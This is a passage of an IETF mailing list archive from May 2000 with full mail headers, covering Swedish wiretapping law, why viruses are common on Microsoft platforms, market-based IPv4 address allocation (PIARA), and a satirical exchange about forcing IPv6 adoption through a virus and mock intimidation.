then you must have a court order based on sufficient believe of criminal
activity. All other wiretapping is forbidden.
This is a slightly stronger statement, since this forbids say NSA to wiretap
phonecalls or computer traffic in Sweden, even by remote means. Also, tapping
radio traffic is useless, since they may not actually do anything with the
information since the spreading of the information is regulated.
But then, it is hard to figure out where the possible crime of wiretapping was
commited and then apply the laws accordingly. Most probably is these laws
broken on continous basis and no one does anything.
BTW. I enjoyed Mr. Palme's discussion.
Cheers,
Magnus
>From owner-ietf-outbound Mon May 8 09:30:16 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA07157
for [EMAIL PROTECTED]; Mon, 8 May 2000 09:30:02 -0400 (EDT)
Received: from corpmail.galaxyscientific.com ([38.221.233.7])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA07134
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 09:29:57 -0400 (EDT)
Received: from BELLOPEM (igate.tc.faa.gov [155.178.180.5]) by
corpmail.galaxyscientific.com with SMTP (Microsoft Exchange Internet Mail Service
Version 5.5.2650.21)
id KL12VXC2; Mon, 8 May 2000 09:28:03 -0400
From: "Michael B. Bellopede" <[EMAIL PROTECTED]>
To: "Randall Stewart" <[EMAIL PROTECTED]>,
"Michael H. Warfield" <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>, "Scot Mc Pherson" <[EMAIL PROTECTED]>,
<[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Mon, 8 May 2000 09:27:14 -0400
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
In-Reply-To: <[EMAIL PROTECTED]>
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
It should be pretty obvious that the only reason that viruses are so
prolific on MS platforms, is that so many people are using them. When
designing a virus to spread, the user base must be considered. A virus
written to infect UNIX systems would not attract much attention anywhere
other than a small circle of professionals and engineers.
Michael B. Bellopede
[EMAIL PROTECTED]
-----Original Message-----
From: Randall Stewart [mailto:[EMAIL PROTECTED]]
Sent: Friday, May 05, 2000 8:05 PM
To: Michael H. Warfield
Cc: [EMAIL PROTECTED]; Scot Mc Pherson; [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
Michael:
I could not agree more, we have a few (possibly .. 3) virus that have
infect *nix systems. Even more telling, look at how linux systems
have NOT been infected or bothered much. I find this interesting
since the code - bugs, wart, and any holes are available to any
who want to look at it...
Now if I take and switch the machine I am typing on over to
that "other" o/s the virus scanner it has lists 100's and I
mean 100's of viruses...
I do understand that some of us are STUCK with that other
O/S... but there are options.. I too am in theory using it.. but
only when I have to... I do all my real work on the linux side and
only occasionaly fire up the other side to read a awful .doc or .ppt
file...
I simply refuse to allow our IT dept to have there way with me and
infect me with the worst virus... that other O/S :-)
R
"Michael H. Warfield" wrote:
>
> On Thu, May 04, 2000 at 11:13:03PM -0400, [EMAIL PROTECTED] wrote:
> > On Thu, 04 May 2000 11:11:50 EDT, Scot Mc Pherson
<[EMAIL PROTECTED]> said:
> > > In fact to back up your statement, there are exactly 3 virii that
infect
> > > UNIX based systems.
>
> > Hmm.. the Morris worm of 1988. What are the other 2?
>
> Bliss? Wasn't very sophisticated and it didn't propagate very
> well, but it did work. It just fizzeled out because it's propagation
> coefficient never even came close to break even.
>
> What's the other one?
>
> > Hmm.. if you count the 2 self-reproducing sample programs that
> > came with 'gcc', no others. Or maybe there's more than 3, which
> > is likely since I've seen at least 4 different "proof of concept"
> > level creations...
>
> I've seen some assembly code someone was proposing on one of the
> development lists. One of the DOS virus writers claiming that it would
> work as a Linux virus. No evidence that it does anything though. I
> would marginally call that one a "proof of concept" or a "maybe of
> concept".
>
> > Valdis Kletnieks
> > Operating Systems Analyst
> > Virginia Tech
>
> Mike
> --
> Michael H. Warfield | (770) 985-6132 | [EMAIL PROTECTED]
> (The Mad Wizard) | (770) 331-2437 |
http://www.wittsend.com/mhw/
> NIC whois: MHW9 | An optimist believes we live in the best of all
> PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it!
--
Randall R. Stewart
Member Technical Staff
Network Architecture and Technology (NAT)
847-632-7438 fax:847-632-6733
>From owner-ietf-outbound Mon May 8 09:40:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id JAA07416
for [EMAIL PROTECTED]; Mon, 8 May 2000 09:40:02 -0400 (EDT)
Received: from necom830.hpcl.titech.ac.jp (necom830.hpcl.titech.ac.jp [131.112.32.132])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA07320
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 09:34:37 -0400 (EDT)
From: Masataka Ohta <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
Received: by necom830.hpcl.titech.ac.jp (8.6.11/TM2.1)
id WAA10273; Mon, 8 May 2000 22:29:10 +0900
Subject: Re: PIARA (IP address space economics)
In-Reply-To: <[EMAIL PROTECTED]> from Sean Doran at "May 8, 2000
02:43:38 pm"
To: Sean Doran <[EMAIL PROTECTED]>
Date: Mon, 8 May 2000 22:29:09 +0859 ()
CC: Bill Manning <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
X-Mailer: ELM [version 2.4ME+ PL68 (25)]
X-Loop: [EMAIL PROTECTED]
Sean;
> Likewise, I think that government agencies in various East
> and South Asian countries, and perhaps various Asian ISPs
> or next-generation mobile telephony organizations
> would be extremely happy to bid for a few historical Class As
> now being under-used by the current registrants, rather
> than being told "no" or "first demonstrate usage" by APNIC.
We, people living or born in Asian-Pacific region, are now thinking
about an aggresively new way of address allocation to promote the
healthy IPv6 Internet.
That is, those promoting the healthy IPv6 Internet will be allocated
a lot of IPv4 addresses.
See a recent ID:
<draft-ohta-address-allocation-00.txt>
Usage Based Address Allocation Considered Harmful
for details of the proposal.
If you still worry about multihoming, see another recent ID of mine:
<draft-ohta-e2e-multihoming-00.txt>
The Architecture of End to End Multihoming
Masataka Ohta
>From owner-ietf-outbound Mon May 8 10:20:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA08265
for [EMAIL PROTECTED]; Mon, 8 May 2000 10:20:02 -0400 (EDT)
Received: from marcos.networkcs.com (marcos.networkcs.com [137.66.16.1])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA08114
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 10:11:08 -0400 (EDT)
Received: from us.networkcs.com (us.networkcs.com [137.66.11.15])
by marcos.networkcs.com (8.9.3/8.9.3) with ESMTP id JAA44665
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 09:11:08 -0500 (CDT)
(envelope-from [EMAIL PROTECTED])
Received: (from salo@localhost)
by us.networkcs.com (8.9.2/8.9.2) id JAA94548
for [EMAIL PROTECTED]; Mon, 8 May 2000 09:11:08 -0500 (CDT)
(envelope-from salo)
Date: Mon, 8 May 2000 09:11:08 -0500 (CDT)
From: Tim Salo <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
In-Reply-To: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
> From: "Michael B. Bellopede" <[EMAIL PROTECTED]>
> Subject: RE: VIRUS WARNING
> Date: Mon, 8 May 2000 09:27:14 -0400
>
> It should be pretty obvious that the only reason that viruses are so
> prolific on MS platforms, is that so many people are using them....
Hardly.
Compare the apparent security considerations in the design of
Microsoft Outlook and Word (execute pretty much anything with few
limitations on the effects the executing code can have on the hosting
system) with those of Java and the Java virtual machine (provide
a sandbox in which the code executes and provide mechanisms (e.g., the
SecurityManager) that control the effects of the code executing in
the sandbox can have on the broader environment).
It should be pretty obvious that security is a greater design consideration
for some systems than for others.
-tjs
>From owner-ietf-outbound Mon May 8 10:50:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA08903
for [EMAIL PROTECTED]; Mon, 8 May 2000 10:50:02 -0400 (EDT)
Received: from sean.ebone.net (IDENT:[EMAIL PROTECTED] [195.158.227.211])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA08809
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 10:44:01 -0400 (EDT)
Received: by sean.ebone.net (Postfix, from userid 1113)
id DB342876; Mon, 8 May 2000 16:44:01 +0200 (CEST)
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: PIARA (IP address space economics)
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
Date: Mon, 8 May 2000 16:44:01 +0200 (CEST)
From: [EMAIL PROTECTED] (Sean Doran)
X-Loop: [EMAIL PROTECTED]
Ohta-san:
| <draft-ohta-address-allocation-00.txt>
While I agree with you that the current usage-based allocation
system is wrong, your draft's "Assignment Plan" (not more restricted)
proposes to continue an anti-market single-seller model for IP
addresses of both IPv4 and IPv6 flavours. There is no scope
for negotiating with the monopoly seller, given this tariff.
On the other hand, I do particularly like The More Restricted Assignment Plan:
No IPv4 address space should be allocated to an ISP, unless the
ISP support fully operational fully transparent IPv6 service with
at least 64K IPv6 subnets to all the end users.
because that will force IANA out of its ostrich position with
respect to being a monopoly seller with a non-negotiable monopoly
tariff that imposes significant costs upon consumers, by immediately
forcing the monopoly to stop "selling" addresses except to people
who meet extraordinarily onerous and expensive conditions.
Unfortunately, because you do not actually propose only
the More Restricted Assignment Plan, your draft effectively continues the
objectionable practice of deliberately introducing artificial
scarcity into IPv4 addresses in order to force your politics upon
ISPs and other businesses. This is identical to a monopoly which
has goods to sell but nevertheless deliberately restricts supply
in order to support higher prices.
There are two main differences between your draft's proposal and
the current system.
One of the differences is that your political ideals
include the deployment of IPv6, which is something the current
usage-based allocation system does not. This is simply a change
of the monopoly tariff, the "price" at which the monopoly will
"sell" consumers (non-transferable) address ranges. So, while
it is an important difference, it is not particularly interesting,
since it is just a higher price in view of a smaller supply.
The much more interesting difference between your draft and the
status quo is that artificial scarcity of IPv4 addresses would evolve
as a result of over-allocating IPv4 address space to applicants,
rather than attempting to allocate the smallest workable amount of
address space, as is the practice now.
This erodes IANA et al.'s monopoly supply, because now
there is a surplus held by many other parties, who then
can act as alternative suppliers of IPv4 address space.
If steps are taken to avoid the development of a massive black
aftermarket for IPv4 addresses overallocated by IANA et al., by providing
the mechanisms of a "white market" -- notably a public registry of
IP address title, with an exclusive but transferable right to
transfer title to another party -- then I would object much less
strenuously to your draft, since it is fundamentally PIARA, but
with a rather odd auctioning system for the remaining not-yet-allocated
IPv4 address space.
Given the involvement of one of your co-authors in the original PIARA
work, I am not at all suprised that the draft can easily be read
to favour the ultimate development of a market for IPv4 addresses.
Let's just not make that market completely black, with all
post-IANA/registry-allocation transactions completely sub rosa.
Note that the development of a "white market" public registry
does not rely upon the IANA. If the IANA and its registries
were to immediately cease offering IPv4 addresse AT ALL, it is
quite clear that market forces would arrive upon a suitable
solution rather quickly. Given that the initial allocation
prices proposed in your draft are extremely onerous when combined
with the conditions in RFC 2450 ("higher cost of acquiring bundled goods,
rather than only one good individually; cross-subsidy"), I imagine
that there could easily develop a situation in which IANA et al.
simply could not find a buyer prepared to meet their price / qualified
to meet the allocation conditions.
Bear in mind that the IANA IP allocation system has two functions:
1/ prevent namespace collision
2/ provide one of many inputs which network operators
may choose to use when configuring their networks
Both of these functions can easily be done elsewhere.
There just has been no reason to do that yet.
Your draft would supply a very strong reason, therefore I support your draft.
How do we get it adopted quickly, and get the IANA, APNIC, ARIN and RIPE
to IMMEDIATELY cease offering IPv4 address space to people who do
not FULLY comply with the requirements in your More Restricted Assignment Plan,
and the various RFCs and standards-tract documents it rests upon?
Sean.
>From owner-ietf-outbound Mon May 8 13:20:47 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA12484
for [EMAIL PROTECTED]; Mon, 8 May 2000 13:20:02 -0400 (EDT)
Received: from mail-blue.research.att.com (mail-blue.research.att.com [135.207.30.102])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA12327
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 13:14:25 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-blue.research.att.com (Postfix) with ESMTP
id ABEF44CE0E; Mon, 8 May 2000 13:14:24 -0400 (EDT)
Received: from smb.research.att.com (postal.research.att.com [135.207.23.30])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id NAA25673;
Mon, 8 May 2000 13:14:23 -0400 (EDT)
Received: from smb.research.att.com (localhost.research.att.com [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id 64D5F35DC2; Mon, 8 May 2000 13:14:23 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: Bill Manning <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED] (Sean Doran), [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 08 May 2000 13:14:23 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <[EMAIL PROTECTED]>, Bill Manning writes:
>
>Sigh,
> Please -NOT- the PIARA again. There is near zero value in the
>number/address
Right. That's why, following the publication of RFC 1631, everyone gave up on
NATs as a bad idea, and no one is selling them. We all have all the addresses
we want, so why bother translating?
--Steve Bellovin
>From owner-ietf-outbound Mon May 8 13:40:15 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA13099
for [EMAIL PROTECTED]; Mon, 8 May 2000 13:40:03 -0400 (EDT)
Received: from mail.nanospace.com ([EMAIL PROTECTED] [209.213.199.10])
by ietf.org (8.9.1a/8.9.1a) with SMTP id NAA13055
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 13:39:34 -0400 (EDT)
Received: (qmail 26508 invoked by uid 74); 8 May 2000 17:39:34 -0000
Received: from [EMAIL PROTECTED] by mail with scan4virus-0.19 (Clean. Processed in
0.465907 secs); 08/05/2000 10:39:33
Received: from thegrind.yipes.com (HELO zzsf220) (209.213.212.254)
by mail.nanospace.com with SMTP; 8 May 2000 17:39:33 -0000
Reply-To: <[EMAIL PROTECTED]>
From: "Jim Stephenson-Dunn" <[EMAIL PROTECTED]>
To: "'Paul Robinson'" <[EMAIL PROTECTED]>,
"'Tripp Lilley'" <[EMAIL PROTECTED]>
Cc: "'Keith Moore'" <[EMAIL PROTECTED]>, "'Greg Skinner'" <[EMAIL PROTECTED]>,
<[EMAIL PROTECTED]>
Subject: RE: IPv6: Past mistakes repeated?
Date: Mon, 8 May 2000 10:39:26 -0700
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
In-Reply-To: <[EMAIL PROTECTED]>
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
I like it, Where do I sign up for my IETF black suit and sun glasses, and
can I nominate my own parking spot in advance ?
The real kicker here would be to upgrade everybody's stacks to v6 and still
fool them into believing they are running v4. The noisy cricket I can do
without (although I can thick of a few admins to use this on, who are not
doing their BGP the way they should) , but the neuralizer is a must ;->
Jim
-----Original Message-----
From: Paul Robinson [mailto:[EMAIL PROTECTED]]
Sent: Monday, May 08, 2000 2:11 AM
To: Tripp Lilley
Cc: Keith Moore; Greg Skinner; [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
Tripp Lilley wrote:
> We came up with a wacky idea here yesterday at Interop... Why not
> accelerate v6 deployment by writing a virus that will upgrade
> end-stations' stacks? :)
Even better, why doesn't the IETF employ a bunch of people dressed in
black suits and wearing sun glasses to go around and 'enforce' IPv6...
not as subtle I know, but administrators have this stupid habit of
deleting viruses once they know what's going on, in the foolish belief
that they know what is best! Pah!
By sending a bunch of heavies around various Network Operations and Data
Operations Centers, we can ensure the quickest possible roll-out of IPv6
under the threat of 'Big Billy' getting 'a bit wild with the baseball
bat, right?' sort-of-thing. I'm sure over here in the UK we can
contribute a few East-London types to help everything along nicely...
> That will give us the pervasive deployment needed to convince the ISPs to
> upgrade the core. The "upgrade" that the virus propagates can do
> gratuitous tunneling until it discovers that the infrastructure between it
> and the rest of the world has been upgraded.
Indeed, your solution would get right down to the end user ultimately,
which our lads would not be able to do necessarily, but if your ISP
phoned you up and told you that you had to upgrade to IPv6 'or else' you
would, wouldn't you?
This would also help us in gaining all sorts of blackmail material about
various administrators and senior managment of various ISPs used to put
a little pressure on them, but would also give the IETF an additional
revenue stream, and could potnetially ensure that even Microsoft started
following the 'standard line'...
> (yes, any such toy would need to include a raft of known exploits for
> various Unices, so we can include them in the "upgrade") :)
No! We don't want to fix the holes! We want to keep a record of them
without telling the admins, and when they misbehave, not only can we pop
their kneecaps, set fire to their house, release information to their
families they wouldn't want to be released, but also as a grand finale,
we can take control of the machine and do what we wanted anyway.
Eventually, we as the IETF would have complete control of every machine
connected to the Internet, thereby giving us control of the entire
planet, which in turn would allow us to park wherever we wanted and
*not*get*a*ticket*!!!!!! :-)
--
Paul Robinson - Developer/Sys Admin @ Akitanet http://www.akitanet.co.uk
------------------------------------------------------------------------
Sales: T:+44 (0)1869 337088 F:+44 (0)1869 337488 E:[EMAIL PROTECTED]
Techs: T:+44 (0)161 228 6388 F:+44 (0)161 228 6387 E:[EMAIL PROTECTED]
------------------------------------------------------------------------
>From owner-ietf-outbound Mon May 8 16:40:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA18713
for [EMAIL PROTECTED]; Mon, 8 May 2000 16:40:02 -0400 (EDT)
Received: from shell5.ba.best.com ([EMAIL PROTECTED] [206.184.139.136])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA18617
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 16:36:32 -0400 (EDT)
Received: (from gds@localhost)
by shell5.ba.best.com (8.9.3/8.9.2/best.sh) id NAA11621;
Mon, 8 May 2000 13:36:30 -0700 (PDT)
Date: Mon, 8 May 2000 13:36:30 -0700 (PDT)
From: Greg Skinner <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
X-Loop: [EMAIL PROTECTED]
"David R. Conrad" <[EMAIL PROTECTED]> wrote:
> Ah, nostalgia. It's so nice to revisit old "discussions"...
There was a similar discussion here about five years ago where some people
proposed market models for address allocation and routing. Unfortunately,
it's not in the archives. If anyone has this discussion archived, could
they please point me to it? Thanks.
--gregbo
>From owner-ietf-outbound Mon May 8 16:50:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA19050
for [EMAIL PROTECTED]; Mon, 8 May 2000 16:50:02 -0400 (EDT)
Received: from shell5.ba.best.com ([EMAIL PROTECTED] [206.184.139.136])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA19027
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 16:49:58 -0400 (EDT)
Received: (from gds@localhost)
by shell5.ba.best.com (8.9.3/8.9.2/best.sh) id NAA16865;
Mon, 8 May 2000 13:49:59 -0700 (PDT)
Date: Mon, 8 May 2000 13:49:59 -0700 (PDT)
From: Greg Skinner <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: PIARA (IP address space economics)
X-Loop: [EMAIL PROTECTED]
[EMAIL PROTECTED] (Sean Doran) wrote:
> If steps are taken to avoid the development of a massive black
> aftermarket for IPv4 addresses overallocated by IANA et al., by providing
> the mechanisms of a "white market" -- notably a public registry of
> IP address title, with an exclusive but transferable right to
> transfer title to another party -- then I would object much less
> strenuously to your draft, since it is fundamentally PIARA, but
> with a rather odd auctioning system for the remaining not-yet-allocated
> IPv4 address space.
[...]
> How do we get it adopted quickly, and get the IANA, APNIC, ARIN and RIPE
> to IMMEDIATELY cease offering IPv4 address space to people who do
> not FULLY comply with the requirements in your More Restricted Assignment
> Plan, and the various RFCs and standards-tract documents it rests upon?
Is this an appropriate discussion for ICANN's ASO policy mailing list?
(Not that I mind reading it here.)
--gregbo
>From owner-ietf-outbound Mon May 8 17:50:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA20688
for [EMAIL PROTECTED]; Mon, 8 May 2000 17:50:02 -0400 (EDT)
Received: from ginger.lcs.mit.edu (ginger.lcs.mit.edu [18.26.0.82])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA20562
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 17:45:17 -0400 (EDT)
Received: (from jnc@localhost)
by ginger.lcs.mit.edu (8.9.1/8.9.1) id RAA18032;
Mon, 8 May 2000 17:45:12 -0400
Date: Mon, 8 May 2000 17:45:12 -0400
From: "J. Noel Chiappa" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
Cc: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> From: Greg Skinner <[EMAIL PROTECTED]>
> There was a similar discussion here about five years ago where some
> people proposed market models for address allocation and routing.
> Unfortunately, it's not in the archives.
I think it was on CIDRD, actually, no?
> If anyone has this discussion archived, could they please point me to
> it?
Well, one thing I do have is the draft of: "Suggestions for Market-Based
Allocation of IP Address Blocks", by Paul Resnick (then of AT&T Research, I
don't know where he is now - Paul, you out there?), which I have at:
http://ana-3.lcs.mit.edu/~jnc/tech/addr_charging.txt
It never turned into an RFC (shame, I thought it was a really well thought
out draft), and I don't think it's anywhere else permanent.
Noel
>From owner-ietf-outbound Mon May 8 18:20:11 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA21292
for [EMAIL PROTECTED]; Mon, 8 May 2000 18:20:02 -0400 (EDT)
Received: from mail-green.research.att.com (H-135-207-30-103.research.att.com
[135.207.30.103])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA21255
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 18:18:06 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-green.research.att.com (Postfix) with ESMTP
id 9263F1E008; Mon, 8 May 2000 18:18:08 -0400 (EDT)
Received: from smb.research.att.com (postal.research.att.com [135.207.23.30])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id SAA01704;
Mon, 8 May 2000 18:18:07 -0400 (EDT)
Received: from smb.research.att.com (localhost.research.att.com [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id ABAC635DC2; Mon, 8 May 2000 18:18:00 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: "J. Noel Chiappa" <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 08 May 2000 18:18:00 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <[EMAIL PROTECTED]>, "J. Noel Chiappa" writes
:
> > From: Greg Skinner <[EMAIL PROTECTED]>
>
> > There was a similar discussion here about five years ago where some
> > people proposed market models for address allocation and routing.
> > Unfortunately, it's not in the archives.
>
>I think it was on CIDRD, actually, no?
>
> > If anyone has this discussion archived, could they please point me to
> > it?
>
>Well, one thing I do have is the draft of: "Suggestions for Market-Based
>Allocation of IP Address Blocks", by Paul Resnick (then of AT&T Research, I
>don't know where he is now - Paul, you out there?), which I have at:
>
> http://ana-3.lcs.mit.edu/~jnc/tech/addr_charging.txt
>
>It never turned into an RFC (shame, I thought it was a really well thought
>out draft), and I don't think it's anywhere else permanent.
See http://www.research.att.com/~smb/papers/piara/index.html, by Paul,
Yakov Rekhter, and myself.
--Steve Bellovin
>From owner-ietf-outbound Mon May 8 19:00:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA22066
for [EMAIL PROTECTED]; Mon, 8 May 2000 19:00:02 -0400 (EDT)
Received: from mail2.itu.int (mail2.itu.ch [156.106.192.18])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA21995
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 18:58:00 -0400 (EDT)
Received: by mail2.itu.ch with Internet Mail Service (5.5.2650.21)
id <KQTVQGTB>; Tue, 9 May 2000 00:54:08 +0200
Message-ID: <[EMAIL PROTECTED]>
From: "Shaw, Robert" <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'"
<[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: RE: Information on Voice Over IP
Date: Mon, 8 May 2000 13:02:44 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Also see under "Information Resources" at
http://www.itu.int/osg/sec/spu/ni/iptel/
Bob
--
Robert Shaw <[EMAIL PROTECTED]>
ITU Internet Strategy and Policy Advisor
International Telecommunication Union <http://www.itu.int>
Place des Nations, 1211 Geneva, Switzerland
>From owner-ietf-outbound Mon May 8 19:10:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id TAA22352
for [EMAIL PROTECTED]; Mon, 8 May 2000 19:10:05 -0400 (EDT)
Received: from shell.nominum.com (shell.nominum.com [204.152.187.59])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id TAA22327
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 19:09:43 -0400 (EDT)
Received: from nominum.com (shell.nominum.com [204.152.187.59])
by shell.nominum.com (Postfix) with ESMTP
id 2B1B431905; Mon, 8 May 2000 16:09:13 -0700 (PDT)
Message-ID: <[EMAIL PROTECTED]>
Date: Mon, 08 May 2000 16:09:11 -0700
From: "David R. Conrad" <[EMAIL PROTECTED]>
Organization: Nominum, Inc.
X-Mailer: Mozilla 4.72 [en]C-CCK-MCD {Sony} (Win98; U)
X-Accept-Language: en,ja
MIME-Version: 1.0
To: "Steven M. Bellovin" <[EMAIL PROTECTED]>
Cc: "J. Noel Chiappa" <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: IPv6: Past mistakes repeated?
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
For the archives of the historic PIARA discussions, see
http://www.apnic.net/wilma-bin/wilma/piara
(I think the mailing list is still alive)
Rgds,
-drc
--------
"Steven M. Bellovin" wrote:
>
> In message <[EMAIL PROTECTED]>, "J. Noel Chiappa" writes
> :
> > > From: Greg Skinner <[EMAIL PROTECTED]>
> >
> > > There was a similar discussion here about five years ago where some
> > > people proposed market models for address allocation and routing.
> > > Unfortunately, it's not in the archives.
> >
> >I think it was on CIDRD, actually, no?
> >
> > > If anyone has this discussion archived, could they please point me to
> > > it?
> >
> >Well, one thing I do have is the draft of: "Suggestions for Market-Based
> >Allocation of IP Address Blocks", by Paul Resnick (then of AT&T Research, I
> >don't know where he is now - Paul, you out there?), which I have at:
> >
> > http://ana-3.lcs.mit.edu/~jnc/tech/addr_charging.txt
> >
> >It never turned into an RFC (shame, I thought it was a really well thought
> >out draft), and I don't think it's anywhere else permanent.
>
> See http://www.research.att.com/~smb/papers/piara/index.html, by Paul,
> Yakov Rekhter, and myself.
>
> --Steve Bellovin
>
> -
> This message was passed through [EMAIL PROTECTED], which
> is a sublist of [EMAIL PROTECTED] Not all messages are passed.
> Decisions on what to pass are made solely by Harald Alvestrand.
>From owner-ietf-outbound Mon May 8 21:00:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA24361
for [EMAIL PROTECTED]; Mon, 8 May 2000 21:00:02 -0400 (EDT)
Received: from unni.dsv.su.se (unni.dsv.su.se [130.237.161.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA24213
for <[EMAIL PROTECTED]>; Mon, 8 May 2000 20:52:19 -0400 (EDT)
Received: from [130.237.150.138] (jph1.dsv.su.se [130.237.150.138])
by unni.dsv.su.se (8.9.3+Sun/8.9.3) with ESMTP
id CAA19961;
Tue, 9 May 2000 02:52:15 +0200 (MET DST)
Mime-Version: 1.0
Message-Id: <v04210134b53d0b7c60c4@[130.237.150.138]>
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Date: Tue, 9 May 2000 02:53:31 +0200
To: [EMAIL PROTECTED]
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
Cc: IETF general mailing list <[EMAIL PROTECTED]>
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
At 11.07 -0800 0-05-07, [EMAIL PROTECTED] wrote:
> Well, I was there, and I question the validity of your assessment of what was
> going on. While it is true that there was a clear concensus opposed to adding
> wiretapping facilities in the RAVEN sense, it was by no means 95-98 percent.
Perhaps I misunderstood the question being asked at the
meeting. I understood the question to be if we wanted to
develop protocols to help police trace net villains, you
